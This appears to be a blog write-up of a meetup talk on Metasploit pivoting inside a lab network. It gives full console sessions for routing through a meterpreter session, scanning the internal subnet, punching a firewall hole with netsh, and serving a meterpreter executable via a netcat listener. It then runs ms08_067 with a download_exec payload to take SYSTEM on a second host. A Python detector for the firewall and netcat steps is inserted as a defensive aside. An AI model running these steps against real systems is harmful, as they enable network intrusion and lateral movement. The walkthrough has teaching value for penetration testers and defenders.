There was a presentation on "Post exploitation techniques using msf-nc kungfu" at the null monthly meet.
So here is a post about the presentation and the things I may have missed.
Aim: There is a compromised machine in a network and you want to find and target other nodes inside that network.
Scenario: The attacker is running BackTrack and sits outside the network. Machine A (the pivot) and machine B are behind the NAT.
So here we go with the meterpreter session on the pivot machine:
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:1e:d3:76
IP Address  : 192.168.74.128
Netmask     : 255.255.255.0

meterpreter > route

Network routes
==============

    Subnet           Netmask          Gateway
    ------           -------          -------
    0.0.0.0          0.0.0.0          192.168.74.2
    127.0.0.0        255.0.0.0        127.0.0.1
    192.168.74.0     255.255.255.0    192.168.74.128
    192.168.74.128   255.255.255.255  127.0.0.1
    192.168.74.255   255.255.255.255  192.168.74.128
    224.0.0.0        240.0.0.0        192.168.74.128
    255.255.255.255  255.255.255.255  192.168.74.128

meterpreter >
1. Pass the traffic for the desired subnet through the meterpreter session: In order to run scans and other modules against the internal network, we need to add a route so that traffic for that subnet is sent through the meterpreter session.
Let's see how we can do that...
Back on the multi/handler...
msf exploit(handler) > route add 192.168.74.0 255.255.255.0 1
msf exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.74.0       255.255.255.0      Session 1

msf exploit(handler) >
So now network traffic meant for the subnet 192.168.74.0/24 will be routed through meterpreter session 1.
2. Enumerate the nodes inside the network: We will use the meterpreter script arp_scanner to scan the network.
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information          Connection
  --  ----                   -----------          ----------
  1   meterpreter x86/win32  WINXP\user @ WINXP   172.16.24.130:443 -> 172.16.24.1:46715

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run arp_scanner -h
Meterpreter Script for performing an ARPS Scan Discovery.

OPTIONS:

    -h   Help menu.
    -i   Enumerate Local Interfaces
    -r   The target address range or CIDR identifier
    -s   Save found IP Addresses to logs.

meterpreter > run arp_scanner -r 192.168.74.0/24
[*] ARP Scanning 192.168.74.0/24
[*]     IP: 192.168.74.1 MAC 0:50:56:c0:0:8
[*]     IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5
[*]     IP: 192.168.74.128 MAC 0:c:29:1e:d3:76
[*]     IP: 192.168.74.129 MAC 0:c:29:7e:bd:74
[*]     IP: 192.168.74.254 MAC 0:50:56:e5:a:b0
meterpreter >
OK. As you can see, five IP addresses appear to be alive on the network.
The IP addresses 192.168.74.1, 192.168.74.2 and 192.168.74.254 belong to VMware Workstation virtual network adapters.
The distribution is as follows:
192.168.74.2 - gateway IP address for the virtual machines behind the NAT
192.168.74.1 - external IP address (vmnet8)
192.168.74.254 - DHCP server for the virtual machines behind the NAT
So, apart from those, there is one more virtual machine which could be of interest to us.
Let's find out...
We will use the TCP portscan auxiliary module to find the open ports (checking some well-known ports)...
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   FILTER                        no        The filter string for capturing traffic
   INTERFACE                     no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   SNAPLEN      65535            yes       The number of bytes to capture
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
   VERBOSE      false            no        Display verbose output

msf auxiliary(tcp) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf auxiliary(tcp) > set PORTS 21,22,23,25,80,110,135,139,443,445
PORTS => 21,22,23,25,80,110,135,139,443,445
msf auxiliary(tcp) > run

[*] 192.168.74.129:139 - TCP OPEN
[*] 192.168.74.129:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
Alright. So file sharing seems to be enabled on the target machine.
We will use the infamous ms08_067 exploit...
But now there is a problem in choosing an appropriate payload:
- A bind-shell payload can't be used, as we have no direct access to machine B. So even if machine B gets exploited and starts listening on the port specified by the payload, we won't be able to connect to it.
- Reverse-connect payloads also can't be used, assuming that machine B has no direct internet access.
So, all I did was upload netcat and a custom file which is a combination of an HTTP response with the meterpreter client executable appended (in this case, if successful, it would of course reverse connect back to the listening multi/handler on the attacker's machine, confirming that the exploit was successful).
Let's do that...
meterpreter > upload /tmp/netcat.exe /tmp/httpresponse-msf.cfg %temp%
[*] uploading  : /tmp/netcat.exe -> %temp%
[*] uploaded   : /tmp/netcat.exe -> %temp%\netcat.exe
[*] uploading  : /tmp/httpresponse-msf.cfg -> %temp%
[*] uploaded   : /tmp/httpresponse-msf.cfg -> %temp%\httpresponse-msf.cfg
meterpreter >
OK. So now we will start a small web server using netcat on the pivot machine, redirecting httpresponse-msf.cfg (which can have any extension) as its response.
meterpreter > execute -H -f cmd.exe -c -i
Process 256 created.
Channel 9 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>cd %temp%
cd %temp%

C:\DOCUME~1\user\LOCALS~1\Temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 080D-40BD

 Directory of C:\DOCUME~1\user\LOCALS~1\Temp

12/05/2010  01:57 AM    <DIR>          .
12/05/2010  01:57 AM    <DIR>          ..
10/23/2009  07:30 PM             8,704 21227.mst
10/23/2009  07:30 PM             8,704 21ad2.mst
10/23/2009  07:30 PM             8,704 48f1e.mst
10/23/2009  07:30 PM             8,704 c833.mst
08/15/2009  02:54 AM             8,704 ff21.mst
12/05/2010  01:57 AM            74,144 httpresponse-msf.cfg
12/05/2010  01:57 AM            61,440 netcat.exe
10/23/2009  07:30 PM            33,709 vminst.log_20091023_193054.log
06/10/2010  11:06 AM            41,986 vminst.log_20100610_110602.log
09/24/2010  12:47 PM            45,686 vminst.log_20100924_124718.log
09/28/2010  04:41 PM            45,537 vminst.log_20100928_164134.log
11/29/2010  03:53 PM            45,537 vminst.log_20101129_155316.log
10/23/2009  07:30 PM         2,573,050 vmmsi.log_20091023_193054.log
10/23/2009  07:30 PM         2,573,050 vmmsi.log_20091023_193054_Failed.log
06/10/2010  11:06 AM         2,958,144 vmmsi.log_20100610_110601.log
09/24/2010  12:47 PM         3,008,988 vmmsi.log_20100924_124718.log
09/28/2010  04:41 PM         2,960,554 vmmsi.log_20100928_164134.log
11/29/2010  03:53 PM         2,958,778 vmmsi.log_20101129_155316.log
11/29/2010  03:54 PM    <DIR>          VMwareDnD
              18 File(s)     17,424,123 bytes
               3 Dir(s)  40,819,601,408 bytes free

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>
listening on [any] 80 ...

C:\DOCUME~1\user\LOCALS~1\Temp>
Oops. Looks like somebody is interfering with our business.
The firewall on the pivot machine may prevent a port from being opened in listening mode.
But we have access to this machine, and here is how we can add an exception to the firewall...
C:\DOCUME~1\user\LOCALS~1\Temp>netsh firewall set portopening tcp 80 nc enable all
netsh firewall set portopening tcp 80 nc enable all
Ok.

C:\DOCUME~1\user\LOCALS~1\Temp>
OK. So now we have opened port 80 and enabled it for listening.
Alright, so let's run netcat once again, as we did before.
C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>
listening on [any] 80 ...

C:\DOCUME~1\user\LOCALS~1\Temp>exit
exit
^C
Terminate channel 9? [y/N] y
meterpreter >
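Added here as a defender's view of the two steps above (the firewall exception and the netcat listener on the pivot), not part of the original post: a small Python detector run over constructed process-creation events. The one-line event layout and the sample lines are assumptions made for this example, not a real log format or real telemetry.

```python
import re
from typing import Dict, List, Optional

# Constructed sample telemetry (not real logs): one process-creation event per line in an
# assumed "<ts> host=<h> parent=<img> image=<img> cmd="<command line>"" layout.
SAMPLE_EVENTS = [
    '2010-12-05T01:57:10 host=WINXP parent=explorer.exe image=notepad.exe cmd="notepad.exe"',
    '2010-12-05T01:58:30 host=WINXP parent=cmd.exe image=netcat.exe cmd="netcat.exe -nlvp 80"',
    '2010-12-05T01:59:01 host=WINXP parent=cmd.exe image=netsh.exe '
    'cmd="netsh firewall set portopening tcp 80 nc enable all"',
    '2010-12-05T02:01:00 host=FILESRV parent=cmd.exe image=ping.exe cmd="ping -l 32 192.168.74.2"',
]

EVENT_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) '
                      r'image=(?P<image>\S+) cmd="(?P<cmd>.*)"$')
# XP-era "netsh firewall set/add portopening <proto> <port>" and the newer advfirewall syntax.
FW_RE = re.compile(r'netsh\s+firewall\s+(?:set|add)\s+portopening\s+(?:tcp|udp)\s+(\d+)'
                   r'|netsh\s+advfirewall\s+firewall\s+add\s+rule', re.I)
NETCAT_NAMES = {"nc.exe", "nc64.exe", "netcat.exe", "ncat.exe"}
LISTEN_RE = re.compile(r'(?<!\S)-[a-zA-Z]*l[a-zA-Z]*(?:\s|$)')   # a -l style listen flag
PORT_RE = re.compile(r'(?<!\S)-[a-zA-Z]*p\s+(\d+)')               # netcat -p <port>


def parse_event(line: str) -> Optional[Dict[str, str]]:
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Flag firewall exceptions and netcat listeners, then correlate them by host and port."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        if not ev:
            continue
        fw = FW_RE.search(ev["cmd"])
        if fw:
            findings.append({"rule": "firewall_exception", "host": ev["host"],
                             "port": fw.group(1) or "?", "cmd": ev["cmd"]})
        if ev["image"].lower() in NETCAT_NAMES and LISTEN_RE.search(ev["cmd"]):
            port = PORT_RE.search(ev["cmd"])
            findings.append({"rule": "netcat_listener", "host": ev["host"],
                             "port": port.group(1) if port else "?", "cmd": ev["cmd"]})
    # A listener plus an exception for the same host/port means that port is now reachable.
    seen = {(f["host"], f["port"], f["rule"]) for f in findings}
    for host, port, rule in sorted(seen):
        if rule == "netcat_listener" and (host, port, "firewall_exception") in seen:
            findings.append({"rule": "exposed_listener", "host": host, "port": port,
                             "cmd": f"listener on {port} with matching firewall exception"})
    return findings
```

The ping line is included as a negative case: `-l` alone is not enough, the image also has to be a known netcat binary, so renamed copies need the usual image-hash or network-side checks on top of this.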
All set. Now set the parameters and run ms08_067 against machine B...
meterpreter > background
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.74.129
RHOST => 192.168.74.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf exploit(ms08_067_netapi) > set URL http://192.168.74.128/
URL => http://192.168.74.128/
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.74.129   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/download_exec):

   Name  Current Setting         Required  Description
   ----  ---------------         --------  -----------
   URL   http://192.168.74.128/  yes       The pre-encoded URL to the executable

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] 172.16.24.1:36593 Request received for /Af4IZ...
[*] 172.16.24.1:36593 Staging connection for target f4IZ received...
[*] Patching Target ID f4IZ into DLL
[*] 172.16.24.1:45245 Request received for /Bf4IZ...
[*] 172.16.24.1:45245 Stage connection for target f4IZ received...
[*] Meterpreter session 2 opened (172.16.24.130:443 -> 172.16.24.1:45245) at 2010-12-04 20:57:45 +0000

msf exploit(ms08_067_netapi) >
Here we go...
As we can see, the exploit was successful and opened meterpreter session 2, connecting back to the attacker's machine.
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  WINXP\user @ WINXP            172.16.24.130:443 -> 172.16.24.1:46715
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WINXP   172.16.24.130:443 -> 172.16.24.1:45245

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:7e:bd:74
IP Address  : 192.168.74.129
Netmask     : 255.255.255.0

meterpreter >
..............Done!!!